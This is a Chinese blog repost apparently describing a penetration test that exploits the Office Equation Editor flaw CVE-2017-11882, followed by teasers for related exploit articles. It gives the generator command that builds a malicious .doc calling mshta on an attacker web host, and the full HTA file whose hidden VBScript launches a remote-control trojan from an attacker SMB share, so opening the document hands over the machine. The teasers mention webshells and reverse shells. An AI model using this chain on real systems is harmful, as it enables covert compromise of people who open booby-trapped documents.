利用cve-2017-11882的一次渗透测试

最新推荐文章于 2025-08-15 16:20:39 发布
最新推荐文章于 2025-08-15 16:20:39 发布
阅读量88 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: python shell 运维
原文链接:http://www.cnblogs.com/wh4am1/p/10142744.html

利用工具:https://github.com/Ridter/CVE-2017-11882/

 影响版本:
office 2003
office 2007
office 2010
office 2013
office 2016

一、思路整理

整体思路如上,通过执行远程的flag.txt里包含的hta格式文件,去执行共享文件夹下的muma.exe,最终导致机器被沦陷

 

二、实际操作

这里操作需要用到之前GitHub上下载的py文件

Command109b_CVE-2017-11882.py -c "mshta http://10.20.38.138/flag.txt" -o test.doc

 最后会在程序目录下生成一个test.doc

最后在10.20.38.138主机上开启web服务就行

flag.txt文件如下

<HTML> 

<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<HEAD> 

<script language="VBScript">

Window.ReSizeTo 0, 0

Window.moveTo -2000,-2000

Set objShell = CreateObject("Wscript.Shell")

objShell.Run "cmd.exe /c start \\10.20.38.138\share\ma.exe"

self.close

</script>

<body>

demo

</body>

</HEAD> 

</HTML>

 

 其中objShell.Run执行的就是启动一个进程,进程的目录就是\\10.20.38.138\share\ma.exe

切记,开启共享文件夹时候,要把密码登录给去掉,不然其他机器无法访问到共享文件夹

最后用远控生成一个ma.exe放到共享文件夹下就OK了

 

三、上线测试

直接在虚拟机XP上打开doc文件

随后会发现远控端上线了

转载于:https://www.cnblogs.com/wh4am1/p/10142744.html

CVE-2017-11882漏洞利用(kali虚拟机开后门)
weixin_44279850的博客
12-27 2080
msf终端简单了解 Metasploit是一款开源的安全漏洞检测工具, Metasploit软件为它基础功能提供了多个用户接口,包括终端、命令行、图像化界面等。 MSF终端(msfconsole)是目前Metasploit框架最为流行的用户接口,而且MSF终端是Metasploit框架中最灵活、功能最丰富以及支持最好的工具之一。MSF终端提供了一站式的接口,能访问Metasploit框架中几乎每一...
36_Joomla! 3.5.1安装部署、CVE-2018-8045漏洞利用CVE-2017-7986漏洞利用CVE-2017-7986_EXP.js
weixin_54591045的博客
08-14 1027
Joomla! 3.5.1安装部署与漏扫、CVE-2018-8045漏洞利用CVE-2017-7986漏洞利用CVE-2017-7986_EXP.js下载
使用CVE-2019-0708进行的一次渗透测试实验
江左盟的博客
10-17 1992
目录 简介 测试环境 相关工具 persistence用法: metsvc用法: 测试过程 遇到的问题 总结 简介 本次渗透测试使用Kali Linux作为攻击机,使用Windows 7作为目标机,通过使用近期爆出的Windows远程桌面服务远程代码执行漏洞(CVE-2019-0708)攻陷目标主机。 测试环境 攻击机:Linux kali 4.15.0-kali3-amd...
JBoss-CVE-2017-7504 漏洞验证
2202_75658977的博客
03-19 591
该漏洞存在于JBoss AS 7.x版本中,特别是在处理Java反序列化对象的过程中存在缺陷。命令:java -jar c:/soft/java/ysoserial-all.jar CommonsCollections7 "touch /tmp/success" > 1.ser。如上图,正常执行完成后,在当前执行命令的路径下(图中为c:\java),生成了1.ser文件(大小一般为几kB)。如前命令,在靶机的/tmp/下创建了文件success,虽然仅是个空文件,但相对于实现了远程命令执行。
weblogic-CVE-2017-12149漏洞验证
2202_75658977的博客
03-19 504
(1)验证漏洞:weblogic-CVE-2017-12149漏洞验证使用nc、burp等工具,构建序列化利用请求,获得反弹shell,实现漏洞利用。1.环境搭建拉取镜像:dockers load -I 地址2.测试准备Win11:3.漏洞验证。
CVE-2017-10271
Dikesi的博客
02-10 2056
Weblogic WLS组件远程代码执行漏洞
MSF渗透测试-CVE-2017-11882(MSOffice漏洞)
weixin_30652491的博客
04-18 433
1.测试环境 2.测试前准备 3.测试过程 —3.1虚拟机环境测试 —3.2局域网靶机测试 4.测试感想 1.测试环境 攻击机: OS:kail IP:192.168.15.132/192.168.137.231 靶机: OS:Windows7 Office版本:Office2013_CN IP: 2.测试前准备 1.下载python脚本 2.下载MSF组件 3.将cve_2017_...
CVE-2017-11882漏洞复现过程中遇到的一些小问题
weixin_44375751的博客
01-24 3882
一、实验环境 靶机:Windows7 office2003 IP:192.168.87.129 渗透机:Kali Linux 2021.4a IP:192.168.87.130 问题1:安装的office2003中插入-对象中没有Microsoft 公式 3.0 解决方法:工具-自定义-命令 类别“插入”中找到命令“公式编辑器” 将其拖到工具栏中,点击图标,提示该功能尚未安装,点击是进行安装。 二、使用POC代码生成word文件 root@kali:~/Desktop/CV...
漏洞复现之Tomcat-CVE-2017-12615
2202_75658977的博客
03-23 946
漏洞的根本原因在于/usr/local/tomcat/conf/web.xml中的readonly属性设置为了false,如果desktop的UI可用,则直接编辑修改web.xml是最简单。中,get给1.jsp(一句话木马)的pwd参数如果其值为"123",则把从浏览器传递的 i参数(字符串)作为命令进行执行,执行结果赋值给变量in。这也就是说,从浏览器i参数传的字符串,变成了tomcat上执行的命令,命令结果回显到浏览器上。使用浏览器验证:http://192.168.32.1:8080/1.jsp。
Jboss Application Server反序列化命令执行漏洞利用工具(CVE-2017-12149)
07-23
漏洞利用工具如压缩包中的"jbosscve-2017-12149",是安全研究人员或渗透测试者用来检测和测试系统是否受到该漏洞影响的工具。这些工具通常包含精心设计的恶意序列化数据,以及用于触发和验证漏洞利用的脚本。它们...
JBossMQJMS 反序列化漏洞(CVE-2017-7504)漏洞利用工具
07-23
JBossMQJMS 反序列化漏洞(CVE-2017-7504)是针对企业级Java消息服务(JMS)提供商JBossMQ的一个严重安全问题。该漏洞源于应用程序未能正确处理反序列化的对象,使得攻击者可以通过精心构造的恶意输入触发任意代码...
数据分析—双十一
2301_82191992的博客
08-12 1230
首先识别数据中各列的数据类型,并计算统计量,包括标准差、最小值、最大值、四分位数等,为后续分析提供基础数据支持。检测到数据中共有86条重复记录,将其删除后重置行索引,数据量从27598条减少至27512条,确保数据的唯一性。发现“销售数量”和“评论数量”两列存在缺失值。经过分析后,决定用零填充这些空值,以保证数据的完整性。
《manim中文教程》
m0_71002812的博客
08-12 934
这篇教程介绍了manim动画库(0.19+版本)的基础使用方法,适合初学者学习。内容涵盖文件执行参数、显示操作、坐标系统、文本/图形类、动画控制等核心功能。教程详细讲解了如何创建和操作2D/3D图形、文本、LaTeX公式,以及如何控制动画播放、位置移动、颜色设置等。还包含坐标系、群组、相机参数等高级功能,并附有常见常数的参考。本教程基于国外开发者Theorem of Beethoven的视频和代码整理而成,采用中文编写,适合想要入门数学动画制作的开发者学习参考。
关于Win系统使用venv创建和管理虚拟环境
qq_43449643的博客
08-15 108
venv配置虚拟环境
Scrapy 基础框架搭建教程:从环境配置到爬虫实现(附实例)
weixin_43883508的博客
08-14 784
本文详细介绍了Scrapy爬虫框架的搭建流程,从环境配置到完整爬虫实现。主要内容包括:1)Python环境准备与Scrapy安装;2)项目结构创建与核心文件功能解析;3)通过图书爬虫实例演示数据提取与页面跳转;4)数据模型定义与JSON存储管道实现;5)关键配置参数与调试技巧。文章提供完整代码示例,帮助开发者30分钟内搭建可扩展的爬虫框架,并给出反爬处理、性能优化等实用建议,适合Python开发者快速上手网页数据采集。
yolo安装
最新发布
a1111111111ss的博客
08-15 141
我在cmd一直更新不了pip 一直说错误。我扭头去anaconda成功。
Pandas数据处理与分析实战:Pandas数据处理入门-环境搭建与基础配置
WSSWWWSSW的博客
08-12 453
摘要 本课程介绍了Pandas数据处理库的环境设置方法,包括Pandas安装和Jupyter Notebook配置。主要内容有:1)通过pip安装Pandas库并验证安装;2)使用pip安装Jupyter Notebook及基础配置;3)在Jupyter中安装特定版本Pandas的方法。课程适用于Windows、macOS和Linux系统,帮助学员为后续数据处理学习搭建必要的开发环境,推荐使用Python 3.6及以上版本。
Python】文本相似度计算方法全解析:从理论到实践
采菊东篱下,Python满乾坤!
08-12 1831
在自然语言处理、信息检索和数据清洗等领域,计算文本相似度是一个基础而重要的任务。无论是检测重复文档、拼写纠错,还是推荐系统,都需要准确地衡量两个文本之间的相似程度。本文将深入解析多种文本相似度计算方法,帮助您选择最适合的算法。文本相似度是指两个文本在内容、结构或语义上的相近程度。通常用0到1之间的数值表示,0表示完全不同,1表示完全相同。文本长度: 短文本适合 Dice 系数,长文本适合余弦相似度计算性能: 汉明距离最快,Levenshtein 较慢但精确应用场景。
python3.12 flashinfer-python安装报错 Cannot import ‘custom_backend‘
zhangjipinggom的博客
08-12 255
改成python3.11。
CVE-2017-7269漏洞复现MSF模块使用教程
通过使用这个模块,用户能够在Metasploit框架内部方便地利用CVE-2017-7269漏洞进行测试。 通常情况下,Metasploit模块文件“cve_2017_7269.rb”会包含以下内容: 1. 漏洞的详细信息:描述漏洞的背景、影响范围、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值